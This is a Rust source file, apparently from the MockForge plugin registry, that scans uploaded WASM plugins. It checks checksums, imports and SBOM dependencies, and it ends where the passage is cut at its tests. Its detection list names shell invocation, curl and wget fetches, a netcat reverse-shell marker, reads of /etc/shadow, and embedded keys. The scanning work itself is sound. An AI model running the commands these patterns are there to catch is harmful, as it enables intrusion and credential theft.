1use std::time::Duration;
36
37use serde_json::{json, Value as JsonValue};
38use sha2::{Digest, Sha256};
39use tracing::{debug, error, info, warn};
40use wasmparser::{Parser, Payload};
41
42use crate::storage::PluginStorage;
43use crate::AppState;
44
/// Period of the background worker's polling timer.
const WORKER_INTERVAL: Duration = Duration::from_secs(30);

/// Value handed to the store when listing pending scans on each tick.
const JOBS_PER_TICK: i64 = 10;

/// Wall-clock budget applied to a single scan attempt; used for both the
/// subprocess scanner and the in-process analysis.
const SCAN_TIMEOUT: Duration = Duration::from_secs(15);

/// Number of leading artifact bytes searched for suspicious byte patterns
/// (32 MiB). Anything beyond this prefix is not pattern-scanned.
const BYTE_SCAN_BUDGET: usize = 32 << 20;
59
/// Import module names a plugin may reference without being flagged.
///
/// Any import whose module name is not listed here produces an
/// "Unknown host import namespace" finding during analysis.
const ALLOWED_IMPORT_NAMESPACES: &[&str] =
    &["wasi_snapshot_preview1", "wasi_unstable", "env", "mockforge", "mockforge_host"];
71
/// Imported function names that trigger a "High-risk WASI import" finding when
/// they come from a module whose name starts with `wasi`.
///
/// Each row is `(function name, severity, capability description)`. The
/// description is spliced into the finding text after "imports a capability
/// that ...".
const HIGH_RISK_WASI_IMPORTS: &[(&str, &str, &str)] = &[
    // Networking.
    ("sock_open", "high", "opens outbound network sockets"),
    ("sock_connect", "high", "initiates outbound network connections"),
    ("sock_bind", "high", "binds to listening sockets"),
    ("sock_accept", "high", "accepts inbound connections"),
    // Filesystem.
    ("path_open", "medium", "opens filesystem paths"),
    ("path_create_directory", "medium", "creates directories"),
    ("path_unlink_file", "medium", "deletes files"),
    ("path_remove_directory", "medium", "removes directories"),
    ("path_rename", "medium", "renames files"),
    // Process control.
    ("proc_exec", "critical", "executes external processes"),
    ("proc_exit", "low", "exits the host process"),
];
89
/// Raw byte sequences whose presence in an artifact produces a "malware"
/// finding.
///
/// Each row is `(needle, severity, description)`. Both the needle and the
/// artifact are ASCII-lowercased before comparison, so matching is
/// case-insensitive.
const SUSPICIOUS_BYTE_PATTERNS: &[(&[u8], &str, &str)] = &[
    // Shell / network tooling.
    (b"/bin/sh -c", "critical", "shell command invocation"),
    (b"/bin/bash -c", "critical", "shell command invocation"),
    (b"curl http", "high", "hardcoded outbound curl URL"),
    (b"wget http", "high", "hardcoded outbound wget URL"),
    (b"nc -e", "critical", "reverse shell marker (netcat -e)"),
    // Sensitive system files.
    (b"/etc/passwd", "high", "attempts to read system credentials file"),
    (b"/etc/shadow", "critical", "attempts to read system shadow file"),
    // Embedded credentials and key material.
    (b"aws_access_key_id=", "critical", "hardcoded AWS access key"),
    (b"AKIA", "medium", "possible AWS access key id"),
    (b"-----BEGIN PRIVATE KEY-----", "critical", "embedded private key"),
    (b"-----BEGIN RSA PRIVATE KEY-----", "critical", "embedded RSA private key"),
    (b"-----BEGIN OPENSSH PRIVATE KEY-----", "critical", "embedded SSH private key"),
    // Cryptominer markers.
    (b"xmr.pool", "critical", "cryptominer pool URL"),
    (b"stratum+tcp", "critical", "cryptominer stratum URL"),
];
111
112pub fn start_plugin_scanner_worker(state: AppState) {
113 tokio::spawn(async move {
114 let mut interval = tokio::time::interval(WORKER_INTERVAL);
117 interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
118
119 loop {
120 interval.tick().await;
121 if let Err(e) = run_once(&state).await {
122 error!("plugin scanner tick failed: {}", e);
123 }
124 }
125 });
126
127 info!(
128 "Plugin security scanner worker started (interval = {}s)",
129 WORKER_INTERVAL.as_secs()
130 );
131}
132
133async fn run_once(state: &AppState) -> anyhow::Result<()> {
134 let jobs = state.store.list_pending_security_scans(JOBS_PER_TICK).await?;
135 if jobs.is_empty() {
136 debug!("plugin scanner: no pending jobs");
137 return Ok(());
138 }
139
140 info!("plugin scanner: processing {} pending job(s)", jobs.len());
141
142 for job in jobs {
143 let plugin_version_id = job.plugin_version_id;
144 let declared_checksum = job.checksum.clone();
145 match scan_one(&state.storage, &job).await {
146 Ok(mut result) => {
147 if let Ok(Some(sbom)) = state.store.get_plugin_version_sbom(plugin_version_id).await
154 {
155 let trust = verify_sbom_binding(&sbom, &declared_checksum);
156 record_sbom_binding(&mut result, &trust);
157
158 if let Ok(Some((key_id, signed_at))) =
164 state.store.get_plugin_version_attestation(plugin_version_id).await
165 {
166 append_finding(
167 &mut result,
168 json!({
169 "severity": "info",
170 "category": "supply_chain",
171 "title": "Verified publisher attestation",
172 "description": format!(
173 "SBOM was signed by a public key ({}) registered to the publishing account on {}. The account vouches for the dependency list.",
174 key_id,
175 signed_at.to_rfc3339()
176 )
177 }),
178 );
179 }
180
181 if matches!(trust, SbomBinding::Bound) {
182 apply_sbom_findings_async(&*state.store, &mut result, &sbom).await;
183 }
184 }
185 if let Err(e) = state
186 .store
187 .upsert_plugin_security_scan(
188 plugin_version_id,
189 &result.status,
190 result.score,
191 &result.findings,
192 Some(env!("CARGO_PKG_VERSION")),
193 )
194 .await
195 {
196 error!(
197 plugin = %job.plugin_name,
198 version = %job.version,
199 "failed to persist scan result: {}",
200 e
201 );
202 }
203 }
204 Err(e) => {
205 warn!(
210 plugin = %job.plugin_name,
211 version = %job.version,
212 "scan failed: {}",
213 e
214 );
215 let findings = json!([
216 {
217 "severity": "high",
218 "category": "other",
219 "title": "Security scan could not complete",
220 "description": format!(
221 "The registry was unable to finish scanning this artifact: {}. An operator will need to retry.",
222 e
223 )
224 }
225 ]);
226 if let Err(persist_err) = state
227 .store
228 .upsert_plugin_security_scan(
229 plugin_version_id,
230 "fail",
231 0,
232 &findings,
233 Some(env!("CARGO_PKG_VERSION")),
234 )
235 .await
236 {
237 error!(
238 plugin = %job.plugin_name,
239 version = %job.version,
240 "failed to persist scan error: {}",
241 persist_err
242 );
243 }
244 }
245 }
246 }
247
248 Ok(())
249}
250
251struct ScanOutcome {
252 status: String,
253 score: i16,
254 findings: JsonValue,
255}
256
257async fn scan_one(
258 storage: &PluginStorage,
259 job: &mockforge_registry_core::models::PendingScanJob,
260) -> anyhow::Result<ScanOutcome> {
261 let key = PluginStorage::plugin_object_key(&job.plugin_name, &job.version)?;
262 let bytes = storage.download_plugin(&key).await?;
263 let declared_size = job.file_size;
264 let declared_checksum = job.checksum.clone();
265
266 if let Some(path) = scanner_binary_path() {
273 match run_subprocess_scan(&path, &bytes, declared_size, &declared_checksum).await {
274 Ok(outcome) => return Ok(outcome),
275 Err(e) => {
276 warn!(
281 plugin = %job.plugin_name,
282 version = %job.version,
283 "subprocess scanner failed ({}) — falling back to in-process analysis",
284 e
285 );
286 }
287 }
288 }
289
290 let scan_fut = tokio::task::spawn_blocking(move || {
299 analyze_bytes(&bytes, declared_size, declared_checksum.as_str())
300 });
301
302 let join_result = match tokio::time::timeout(SCAN_TIMEOUT, scan_fut).await {
303 Ok(res) => res,
304 Err(_) => {
305 return Ok(ScanOutcome {
306 status: "fail".to_string(),
307 score: 0,
308 findings: JsonValue::Array(vec![json!({
309 "severity": "high",
310 "category": "other",
311 "title": "Scan timed out",
312 "description": format!(
313 "Static analysis exceeded the {}s budget. This usually means a pathological WASM input; the artifact is rejected until a manual review runs.",
314 SCAN_TIMEOUT.as_secs()
315 )
316 })]),
317 });
318 }
319 };
320
321 match join_result {
322 Ok(outcome) => Ok(outcome),
323 Err(join_err) => {
324 Ok(ScanOutcome {
327 status: "fail".to_string(),
328 score: 0,
329 findings: JsonValue::Array(vec![json!({
330 "severity": "critical",
331 "category": "other",
332 "title": "Scanner panicked",
333 "description": format!(
334 "The static scanner panicked while processing this artifact: {}. This is a scanner bug — the plugin has been marked failed pending investigation.",
335 join_err
336 )
337 })]),
338 })
339 }
340 }
341}
342
/// Resolves the scanner executable to launch.
///
/// Reads `MOCKFORGE_PLUGIN_SCANNER_BIN`; a value that is unset, not valid
/// Unicode, or blank falls back to the bare command name
/// `mockforge-plugin-scanner`. Surrounding whitespace is stripped from the
/// override: the value was already validated with `trim()`, and returning it
/// untrimmed made a padded setting impossible to execute.
///
/// Always returns `Some`; the `Option` is kept for callers.
fn scanner_binary_path() -> Option<String> {
    let configured = std::env::var("MOCKFORGE_PLUGIN_SCANNER_BIN").ok();
    let path = configured
        .as_deref()
        .map(str::trim)
        .filter(|candidate| !candidate.is_empty())
        .unwrap_or("mockforge-plugin-scanner");
    Some(path.to_string())
}
356
357async fn run_subprocess_scan(
358 scanner_path: &str,
359 bytes: &[u8],
360 declared_size: i64,
361 declared_checksum: &str,
362) -> anyhow::Result<ScanOutcome> {
363 let bytes_owned = bytes.to_vec();
369 let tmp_path = tokio::task::spawn_blocking(move || -> std::io::Result<_> {
370 use std::io::Write;
371 let mut tmp = tempfile::NamedTempFile::new()?;
372 tmp.write_all(&bytes_owned)?;
373 tmp.flush()?;
374 Ok(tmp.into_temp_path())
376 })
377 .await??;
378
379 let mut cmd = tokio::process::Command::new(scanner_path);
380 cmd.arg("--wasm-path")
381 .arg::<&std::path::Path>(tmp_path.as_ref())
382 .arg("--checksum")
383 .arg(declared_checksum)
384 .arg("--declared-size")
385 .arg(declared_size.to_string())
386 .kill_on_drop(true)
387 .stdout(std::process::Stdio::piped())
388 .stderr(std::process::Stdio::piped());
389
390 let output_fut = cmd.output();
391 let output = match tokio::time::timeout(SCAN_TIMEOUT, output_fut).await {
392 Ok(res) => res?,
393 Err(_) => {
394 anyhow::bail!(
395 "subprocess scanner exceeded {}s wall-clock budget",
396 SCAN_TIMEOUT.as_secs()
397 );
398 }
399 };
400
401 drop(tmp_path);
404
405 if !output.status.success() {
406 anyhow::bail!(
407 "subprocess scanner exited with {}: {}",
408 output.status,
409 String::from_utf8_lossy(&output.stderr).trim()
410 );
411 }
412
413 let report: SubprocessReport = serde_json::from_slice(&output.stdout).map_err(|e| {
414 anyhow::anyhow!(
415 "subprocess scanner returned invalid JSON: {} (stdout was: {:?})",
416 e,
417 String::from_utf8_lossy(&output.stdout)
418 )
419 })?;
420
421 let findings = serde_json::to_value(&report.findings)?;
426
427 Ok(ScanOutcome {
428 status: report.status,
429 score: report.score,
430 findings,
431 })
432}
433
434#[derive(Debug, serde::Deserialize)]
435struct SubprocessReport {
436 status: String,
437 score: i16,
438 findings: Vec<SubprocessFinding>,
439 #[allow(dead_code)]
440 dynamic_instantiable: bool,
441 #[allow(dead_code)]
442 duration_ms: u128,
443}
444
445#[derive(Debug, serde::Deserialize, serde::Serialize)]
446struct SubprocessFinding {
447 severity: String,
448 category: String,
449 title: String,
450 description: String,
451}
452
453fn analyze_bytes(bytes: &[u8], declared_size: i64, declared_checksum: &str) -> ScanOutcome {
454 let mut findings: Vec<JsonValue> = Vec::new();
455 let mut score: i16 = 100;
456
457 let actual_size = bytes.len() as i64;
460 if actual_size != declared_size {
461 findings.push(json!({
462 "severity": "high",
463 "category": "other",
464 "title": "Artifact size mismatch",
465 "description": format!(
466 "Stored artifact is {} bytes but the publish request declared {}.",
467 actual_size, declared_size
468 )
469 }));
470 score -= 40;
471 }
472
473 let computed = {
474 let mut hasher = Sha256::new();
475 hasher.update(bytes);
476 hex_encode(&hasher.finalize())
477 };
478 if !computed.eq_ignore_ascii_case(declared_checksum) {
479 findings.push(json!({
480 "severity": "critical",
481 "category": "supply_chain",
482 "title": "Checksum mismatch",
483 "description": format!(
484 "SHA-256 of stored artifact ({}) does not match the checksum recorded at publish time ({}).",
485 computed, declared_checksum
486 )
487 }));
488 score = score.saturating_sub(60);
489 }
490
491 if bytes.len() < 8 || &bytes[0..4] != b"\0asm" {
494 findings.push(json!({
495 "severity": "critical",
496 "category": "other",
497 "title": "Not a valid WebAssembly module",
498 "description": "Artifact does not begin with the WASM magic bytes (\\0asm). It cannot be loaded by any MockForge runtime.",
499 }));
500 return ScanOutcome {
501 status: "fail".to_string(),
502 score: 0,
503 findings: JsonValue::Array(findings),
504 };
505 }
506
507 let version = u32::from_le_bytes([bytes[4], bytes[5], bytes[6], bytes[7]]);
511 if version != 1 {
512 findings.push(json!({
513 "severity": "medium",
514 "category": "other",
515 "title": "Unexpected WASM binary version",
516 "description": format!(
517 "Module declares WASM binary version {} — the only currently-stable value is 1. This may indicate an experimental toolchain.",
518 version
519 )
520 }));
521 score = score.saturating_sub(10);
522 }
523
524 let mut import_count = 0u32;
527 let mut unknown_namespaces = std::collections::BTreeSet::new();
528 let mut high_risk_imports: Vec<(String, &'static str, &'static str)> = Vec::new();
529 let mut export_count = 0u32;
530 let mut has_plugin_entrypoint = false;
531 let mut data_segment_bytes: usize = 0;
532 let mut parse_error: Option<String> = None;
533
534 let parser = Parser::new(0);
535 for payload in parser.parse_all(bytes) {
536 match payload {
537 Ok(Payload::ImportSection(reader)) => {
538 for import in reader {
539 match import {
540 Ok(imp) => {
541 import_count += 1;
542 let ns = imp.module;
543 if !ALLOWED_IMPORT_NAMESPACES.contains(&ns) {
544 unknown_namespaces.insert(ns.to_string());
545 }
546 if ns.starts_with("wasi") {
547 if let Some(entry) =
548 HIGH_RISK_WASI_IMPORTS.iter().find(|(n, _, _)| *n == imp.name)
549 {
550 high_risk_imports.push((
551 format!("{}::{}", ns, imp.name),
552 entry.1,
553 entry.2,
554 ));
555 }
556 }
557 }
558 Err(e) => {
559 parse_error = Some(format!("malformed import: {}", e));
560 break;
561 }
562 }
563 }
564 }
565 Ok(Payload::ExportSection(reader)) => {
566 for export in reader {
567 match export {
568 Ok(exp) => {
569 export_count += 1;
570 if exp.name.starts_with("_mockforge_")
576 || exp.name.starts_with("mockforge_plugin_")
577 || exp.name == "_start"
578 {
579 has_plugin_entrypoint = true;
580 }
581 }
582 Err(e) => {
583 parse_error = Some(format!("malformed export: {}", e));
584 break;
585 }
586 }
587 }
588 }
589 Ok(Payload::DataSection(reader)) => {
590 for segment in reader {
591 match segment {
592 Ok(seg) => {
593 data_segment_bytes = data_segment_bytes.saturating_add(seg.data.len());
594 }
595 Err(e) => {
596 parse_error = Some(format!("malformed data segment: {}", e));
597 break;
598 }
599 }
600 }
601 }
602 Ok(_) => {}
603 Err(e) => {
604 parse_error = Some(e.to_string());
605 break;
606 }
607 }
608 }
609
610 if let Some(err) = parse_error {
611 findings.push(json!({
612 "severity": "high",
613 "category": "other",
614 "title": "WASM module failed to parse",
615 "description": format!("wasmparser rejected the module: {}", err),
616 }));
617 score = score.saturating_sub(40);
618 }
619
620 if !unknown_namespaces.is_empty() {
623 score = score.saturating_sub(15);
624 for ns in &unknown_namespaces {
625 findings.push(json!({
626 "severity": "medium",
627 "category": "supply_chain",
628 "title": "Unknown host import namespace",
629 "description": format!(
630 "Plugin imports from '{}', which is not provided by any MockForge runtime binding.",
631 ns
632 )
633 }));
634 }
635 }
636
637 for (full_name, severity, human) in &high_risk_imports {
640 let penalty: i16 = match *severity {
641 "critical" => 40,
642 "high" => 20,
643 "medium" => 8,
644 _ => 3,
645 };
646 score = score.saturating_sub(penalty);
647 findings.push(json!({
648 "severity": severity,
649 "category": "insecure_coding",
650 "title": format!("High-risk WASI import: {}", full_name),
651 "description": format!(
652 "This plugin imports a capability that {}. MockForge plugins usually do not need this — review carefully before using.",
653 human
654 )
655 }));
656 }
657
658 if export_count > 0 && !has_plugin_entrypoint {
662 findings.push(json!({
663 "severity": "info",
664 "category": "other",
665 "title": "No MockForge plugin entrypoint found",
666 "description": "No exported function matched '_mockforge_*', 'mockforge_plugin_*', or '_start'. This may just be a naming convention mismatch, but the plugin runtime may fail to load it."
667 }));
668 }
669
670 findings.push(json!({
673 "severity": "info",
674 "category": "other",
675 "title": "Module inventory",
676 "description": format!(
677 "{} import(s), {} export(s), {} byte(s) in data segments.",
678 import_count, export_count, data_segment_bytes
679 )
680 }));
681
682 let scan_slice = if bytes.len() > BYTE_SCAN_BUDGET {
685 &bytes[..BYTE_SCAN_BUDGET]
686 } else {
687 bytes
688 };
689 let lowered = scan_slice.to_ascii_lowercase();
690 for (pattern, severity, description) in SUSPICIOUS_BYTE_PATTERNS {
691 let needle = pattern.to_ascii_lowercase();
692 if contains_subslice(&lowered, &needle) {
693 let penalty: i16 = match *severity {
694 "critical" => 50,
695 "high" => 25,
696 "medium" => 10,
697 _ => 5,
698 };
699 score = score.saturating_sub(penalty);
700 findings.push(json!({
701 "severity": severity,
702 "category": "malware",
703 "title": format!("Suspicious byte pattern: {}", description),
704 "description": format!(
705 "Artifact contains the byte pattern '{}'. This is a strong signal of {}.",
706 String::from_utf8_lossy(pattern),
707 description
708 )
709 }));
710 }
711 }
712
713 if bytes.len() > BYTE_SCAN_BUDGET {
714 findings.push(json!({
715 "severity": "info",
716 "category": "other",
717 "title": "Artifact exceeds byte-scan budget",
718 "description": format!(
719 "Only the first {} bytes were scanned for byte patterns. Artifacts larger than this cap should be reviewed manually.",
720 BYTE_SCAN_BUDGET
721 )
722 }));
723 }
724
725 let clamped = score.clamp(0, 100);
728 let status = if clamped >= 70 {
729 "pass"
730 } else if clamped >= 40 {
731 "warning"
732 } else {
733 "fail"
734 };
735
736 ScanOutcome {
737 status: status.to_string(),
738 score: clamped,
739 findings: JsonValue::Array(findings),
740 }
741}
742
/// Reports whether `needle` occurs as a contiguous run inside `haystack`.
///
/// An empty needle never matches, and neither does a needle longer than the
/// haystack.
fn contains_subslice(haystack: &[u8], needle: &[u8]) -> bool {
    match needle.len() {
        0 => false,
        width if width > haystack.len() => false,
        width => haystack.windows(width).any(|candidate| candidate == needle),
    }
}
752
/// Built-in seed list of known-bad packages, consulted by
/// `apply_sbom_findings`.
///
/// Each row is `(ecosystem, package name, version prefix, severity,
/// description)`. Ecosystem and name must match exactly; the version matches
/// when it starts with the prefix, and an empty prefix matches every version.
const KNOWN_VULNERABLE_PACKAGES: &[(&str, &str, &str, &str, &str)] = &[
    // npm
    (
        "npm",
        "event-stream",
        "3.3.6",
        "critical",
        "event-stream@3.3.6 shipped a malicious payload (flatmap-stream) targeting a specific bitcoin wallet library (2018).",
    ),
    (
        "npm",
        "flatmap-stream",
        "0.1.1",
        "critical",
        "flatmap-stream@0.1.1 was the vehicle for the event-stream supply-chain compromise.",
    ),
    (
        "npm",
        "colors",
        "1.4.1",
        "high",
        "colors@1.4.1 was intentionally sabotaged by the maintainer to emit garbage output (2022).",
    ),
    (
        "npm",
        "faker",
        "6.6.6",
        "high",
        "faker@6.6.6 was intentionally broken by the maintainer (2022).",
    ),
    (
        "npm",
        "ua-parser-js",
        "0.7.29",
        "high",
        "ua-parser-js@0.7.29 had a credential-stealer injected during a brief maintainer compromise.",
    ),
    // cargo
    (
        "cargo",
        "rustdecimal",
        "",
        "critical",
        "rustdecimal (all versions) was a typosquat of rust_decimal hosting a malicious payload.",
    ),
    (
        "cargo",
        "openssl-src",
        "111.0.",
        "high",
        "openssl-src 111.0.x bundles very old OpenSSL with several CVEs. Upgrade to 300.x or later.",
    ),
    // pypi
    (
        "pypi",
        "ctx",
        "",
        "critical",
        "ctx on PyPI was hijacked in 2022 and replaced with a credential exfiltrator; any version pins are suspect.",
    ),
];
822
/// Result of checking whether an SBOM refers to the published artifact.
#[derive(Debug)]
enum SbomBinding {
    /// Some SHA-256 digest in the SBOM equals the artifact checksum.
    Bound,
    /// The SBOM declares no SHA-256 digest at all.
    Unsigned,
    /// The SBOM declares digests, but none equals the artifact checksum.
    /// `declared` is the first digest that was found.
    Mismatch { declared: String },
}
844
845fn verify_sbom_binding(sbom: &JsonValue, expected_checksum: &str) -> SbomBinding {
846 let expected = expected_checksum.to_ascii_lowercase();
847
848 let mut declared: Vec<String> = Vec::new();
851 collect_sha256_hashes(sbom, &mut declared);
852
853 if declared.is_empty() {
854 return SbomBinding::Unsigned;
855 }
856
857 for d in &declared {
858 if d.eq_ignore_ascii_case(&expected) {
859 return SbomBinding::Bound;
860 }
861 }
862
863 SbomBinding::Mismatch {
866 declared: declared.into_iter().next().unwrap_or_default(),
867 }
868}
869
870fn collect_sha256_hashes(node: &JsonValue, out: &mut Vec<String>) {
874 match node {
875 JsonValue::Object(map) => {
876 if let Some(JsonValue::Array(hashes)) = map.get("hashes") {
877 for h in hashes {
878 let alg =
879 h.get("alg").and_then(|v| v.as_str()).unwrap_or("").to_ascii_lowercase();
880 let content = h.get("content").and_then(|v| v.as_str()).unwrap_or("");
881 if (alg == "sha-256" || alg == "sha256") && !content.is_empty() {
882 out.push(content.to_ascii_lowercase());
883 }
884 }
885 }
886 for v in map.values() {
887 collect_sha256_hashes(v, out);
888 }
889 }
890 JsonValue::Array(arr) => {
891 for v in arr {
892 collect_sha256_hashes(v, out);
893 }
894 }
895 _ => {}
896 }
897}
898
899fn record_sbom_binding(outcome: &mut ScanOutcome, binding: &SbomBinding) {
900 match binding {
901 SbomBinding::Bound => {
902 append_finding(
903 outcome,
904 json!({
905 "severity": "info",
906 "category": "supply_chain",
907 "title": "SBOM bound to artifact",
908 "description": "SBOM contains a SHA-256 digest matching the published WASM. Dependency findings below are derived from this verified SBOM."
909 }),
910 );
911 }
912 SbomBinding::Unsigned => {
913 append_finding(
914 outcome,
915 json!({
916 "severity": "medium",
917 "category": "supply_chain",
918 "title": "SBOM not bound to artifact",
919 "description": "SBOM did not declare a SHA-256 hash for the artifact. Without a hash there's no way to prove this SBOM describes the WASM being published — dependency scanning was skipped. Add a `hashes: [{alg: \"SHA-256\", content: \"...\"}]` entry to metadata.component or the matching components[] row."
920 }),
921 );
922 let current = outcome.score as i32;
924 let new = (current - 5).clamp(0, 100);
925 outcome.score = new as i16;
926 }
927 SbomBinding::Mismatch { declared } => {
928 append_finding(
929 outcome,
930 json!({
931 "severity": "critical",
932 "category": "supply_chain",
933 "title": "SBOM claims a different artifact",
934 "description": format!(
935 "SBOM declared SHA-256 `{}`, but the published artifact hashes to a different value. The SBOM is not about this WASM — dependency scanning was skipped and the artifact is marked fail.",
936 declared
937 )
938 }),
939 );
940 let current = outcome.score as i32;
942 let new = (current - 60).clamp(0, 100);
943 outcome.score = new as i16;
944 outcome.status = if new >= 70 {
945 outcome.status.clone()
946 } else if new >= 40 {
947 "warning".to_string()
948 } else {
949 "fail".to_string()
950 };
951 }
952 }
953}
954
955async fn apply_sbom_findings_async(
960 store: &dyn crate::store::RegistryStore,
961 outcome: &mut ScanOutcome,
962 sbom: &JsonValue,
963) {
964 let cache_empty = store.count_osv_advisories().await.unwrap_or(0) == 0;
965 if cache_empty {
966 apply_sbom_findings(outcome, sbom);
969 append_finding(
970 outcome,
971 json!({
972 "severity": "info",
973 "category": "other",
974 "title": "Using seed vulnerability list",
975 "description": "OSV advisory cache is empty — the scanner fell back to the built-in seed list. Run the osv_sync worker to populate the cache."
976 }),
977 );
978 return;
979 }
980
981 let components = match sbom.get("components").and_then(|c| c.as_array()) {
982 Some(c) => c,
983 None => {
984 append_finding(
985 outcome,
986 json!({
987 "severity": "info",
988 "category": "other",
989 "title": "SBOM has no 'components' array",
990 "description": "Expected CycloneDX-shaped SBOM with a top-level 'components' array. Vulnerability check skipped."
991 }),
992 );
993 return;
994 }
995 };
996
997 let mut checked = 0usize;
998 let mut score_delta: i32 = 0;
999 for comp in components {
1000 let Some((ecosystem, name, version)) = parse_component(comp) else {
1001 continue;
1002 };
1003 checked += 1;
1004
1005 let matches = match store.find_osv_matches(&ecosystem, &name, &version).await {
1006 Ok(m) => m,
1007 Err(e) => {
1008 warn!("osv lookup failed for {}:{}@{}: {}", ecosystem, name, version, e);
1009 continue;
1010 }
1011 };
1012
1013 for m in matches {
1014 let penalty: i32 = match m.severity.as_str() {
1015 "critical" => 40,
1016 "high" => 20,
1017 "medium" => 8,
1018 _ => 3,
1019 };
1020 score_delta = score_delta.saturating_add(penalty);
1021 append_finding(
1022 outcome,
1023 json!({
1024 "severity": m.severity,
1025 "category": "vulnerable_dependency",
1026 "title": format!(
1027 "{}: {}:{}@{}",
1028 m.advisory_id, ecosystem, name, version
1029 ),
1030 "description": m.summary,
1031 }),
1032 );
1033 }
1034 }
1035
1036 append_finding(
1037 outcome,
1038 json!({
1039 "severity": "info",
1040 "category": "other",
1041 "title": "SBOM scanned against OSV cache",
1042 "description": format!(
1043 "Checked {} component(s) against the live OSV advisory cache.",
1044 checked
1045 )
1046 }),
1047 );
1048
1049 if score_delta > 0 {
1050 let current = outcome.score as i32;
1051 let new = (current - score_delta).clamp(0, 100);
1052 outcome.score = new as i16;
1053 outcome.status = if new >= 70 {
1054 outcome.status.clone()
1055 } else if new >= 40 {
1056 "warning".to_string()
1057 } else {
1058 "fail".to_string()
1059 };
1060 }
1061}
1062
1063fn apply_sbom_findings(outcome: &mut ScanOutcome, sbom: &JsonValue) {
1071 let components = match sbom.get("components").and_then(|c| c.as_array()) {
1072 Some(c) => c,
1073 None => {
1074 append_finding(
1075 outcome,
1076 json!({
1077 "severity": "info",
1078 "category": "other",
1079 "title": "SBOM has no 'components' array",
1080 "description": "Expected CycloneDX-shaped SBOM with a top-level 'components' array. Vulnerability check skipped."
1081 }),
1082 );
1083 return;
1084 }
1085 };
1086
1087 let mut checked = 0usize;
1088 let mut score_delta: i32 = 0;
1089 for comp in components {
1090 let Some((ecosystem, name, version)) = parse_component(comp) else {
1093 continue;
1094 };
1095 checked += 1;
1096
1097 for (vuln_eco, vuln_name, vuln_prefix, severity, description) in KNOWN_VULNERABLE_PACKAGES {
1098 if *vuln_eco != ecosystem || *vuln_name != name {
1099 continue;
1100 }
1101 if !vuln_prefix.is_empty() && !version.starts_with(vuln_prefix) {
1102 continue;
1103 }
1104 let penalty: i32 = match *severity {
1105 "critical" => 40,
1106 "high" => 20,
1107 "medium" => 8,
1108 _ => 3,
1109 };
1110 score_delta = score_delta.saturating_add(penalty);
1111 append_finding(
1112 outcome,
1113 json!({
1114 "severity": severity,
1115 "category": "vulnerable_dependency",
1116 "title": format!("Known-bad dependency: {}:{}@{}", ecosystem, name, version),
1117 "description": description,
1118 }),
1119 );
1120 }
1121 }
1122
1123 append_finding(
1124 outcome,
1125 json!({
1126 "severity": "info",
1127 "category": "other",
1128 "title": "SBOM scanned",
1129 "description": format!(
1130 "Checked {} component(s) against {} known-vulnerable entries.",
1131 checked,
1132 KNOWN_VULNERABLE_PACKAGES.len()
1133 )
1134 }),
1135 );
1136
1137 if score_delta > 0 {
1138 let current = outcome.score as i32;
1139 let new = (current - score_delta).clamp(0, 100);
1140 outcome.score = new as i16;
1141 outcome.status = if new >= 70 {
1143 outcome.status.clone()
1144 } else if new >= 40 {
1145 "warning".to_string()
1146 } else {
1147 "fail".to_string()
1148 };
1149 }
1150}
1151
1152fn parse_component(comp: &JsonValue) -> Option<(String, String, String)> {
1157 if let Some(purl) = comp.get("purl").and_then(|v| v.as_str()) {
1158 if let Some(rest) = purl.strip_prefix("pkg:") {
1160 let mut parts = rest.splitn(2, '/');
1161 let ecosystem = parts.next()?.to_ascii_lowercase();
1162 let name_ver = parts.next()?;
1163 let mut nv = name_ver.splitn(2, '@');
1164 let name = nv.next()?.to_string();
1165 let version = nv.next().unwrap_or("").to_string();
1166 return Some((ecosystem, name, version));
1167 }
1168 }
1169 let name = comp.get("name")?.as_str()?.to_string();
1170 let version = comp.get("version").and_then(|v| v.as_str()).unwrap_or("").to_string();
1171 let ecosystem = comp
1174 .get("group")
1175 .and_then(|v| v.as_str())
1176 .map(str::to_ascii_lowercase)
1177 .unwrap_or_else(|| "unknown".to_string());
1178 Some((ecosystem, name, version))
1179}
1180
1181fn append_finding(outcome: &mut ScanOutcome, finding: JsonValue) {
1182 match &mut outcome.findings {
1183 JsonValue::Array(arr) => arr.push(finding),
1184 _ => {
1185 outcome.findings = JsonValue::Array(vec![finding]);
1186 }
1187 }
1188}
1189
/// Renders `bytes` as a lowercase hexadecimal string, two digits per byte.
fn hex_encode(bytes: &[u8]) -> String {
    const DIGITS: [char; 16] = [
        '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f',
    ];

    let mut encoded = String::with_capacity(bytes.len() * 2);
    for &byte in bytes {
        // High nibble first, then low nibble.
        encoded.push(DIGITS[usize::from(byte >> 4)]);
        encoded.push(DIGITS[usize::from(byte & 0x0f)]);
    }
    encoded
}
1199
#[cfg(test)]
mod tests {
    use super::*;

    /// Smallest valid module: magic bytes plus binary version 1, no sections.
    const EMPTY_WASM: &[u8] = b"\0asm\x01\x00\x00\x00";

    /// Hex SHA-256 of `bytes`, computed the same way the scanner does.
    fn sha256_hex(bytes: &[u8]) -> String {
        hex_encode(&Sha256::digest(bytes))
    }

    /// A pristine outcome to apply SBOM logic to.
    fn clean_outcome() -> ScanOutcome {
        ScanOutcome {
            status: "pass".to_string(),
            score: 100,
            findings: JsonValue::Array(vec![]),
        }
    }

    /// True when any finding's title satisfies `pred`.
    fn any_title(outcome: &ScanOutcome, pred: impl Fn(&str) -> bool) -> bool {
        outcome
            .findings
            .as_array()
            .unwrap()
            .iter()
            .any(|f| pred(f["title"].as_str().unwrap()))
    }

    // ----- low-level helpers ----------------------------------------------

    #[test]
    fn hex_encode_matches_sha2_hex_crate() {
        let digest = Sha256::digest(b"hello world");
        assert_eq!(hex_encode(&digest), hex::encode(digest));
    }

    #[test]
    fn contains_subslice_edge_cases() {
        assert!(!contains_subslice(b"", b"abc"));
        assert!(!contains_subslice(b"ab", b"abc"));
        assert!(!contains_subslice(b"ab", b""));
        assert!(contains_subslice(b"abcdef", b"cde"));
        assert!(contains_subslice(b"abcdef", b"a"));
        assert!(contains_subslice(b"abcdef", b"f"));
        assert!(!contains_subslice(b"abcdef", b"xyz"));
    }

    // ----- analyze_bytes ---------------------------------------------------

    #[test]
    fn analyze_empty_module_is_clean() {
        let checksum = sha256_hex(EMPTY_WASM);
        let outcome = analyze_bytes(EMPTY_WASM, EMPTY_WASM.len() as i64, &checksum);
        assert_eq!(outcome.status, "pass");
        assert!(outcome.score >= 70, "expected passing score, got {}", outcome.score);
    }

    #[test]
